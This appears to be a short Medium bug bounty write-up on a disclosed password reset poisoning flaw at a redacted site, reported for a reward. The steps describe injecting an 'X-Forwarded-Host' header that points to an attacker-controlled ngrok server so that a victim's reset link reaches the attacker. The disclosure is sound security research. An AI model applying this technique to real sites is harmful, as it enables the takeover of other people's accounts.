Account Takeover Through Password Reset Poisoning

  1. BurpSuite
  2. Ngrok Server
  1. Go to https://redacted.com/users/forgot_password and type username to get forget password link.
  2. Capture this request in Burpsuite and add X-Forwarded-Host: bing.com
Added Host Header
  1. I created my server via ngrok which is Attackers server.
  2. Then Attacker go to the page which is https://redacted.com/users/forgot_password and type Victim username and capture the request in Burp suite.
  3. In captured request Attacker add “X-Forwarded-Host: ngrok.io” ngrok.io=ngrok server address.
  1. I reported to them 1st August
  2. They saw the report, steps to reproduce, and PoC(Screenshots, Videos).
  3. And, they rewarded me with 3 digit $(Between $700-$1000).

Penetration Tester, Bug Bounty Hunter, Security Researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vishal Bharad

Vishal Bharad

Penetration Tester, Bug Bounty Hunter, Security Researcher

More from Medium

IDOR with Autorize!

Bypassing Cloudflare’s WAF!

WolvSec CTF — March, 2022

Challenge window with details “Felt a little dizzy and loopy when I wrote this! My blood sugar is probably a little low… should grab some cookies!”

Buffer Overflow Challenge #1 Walkthrough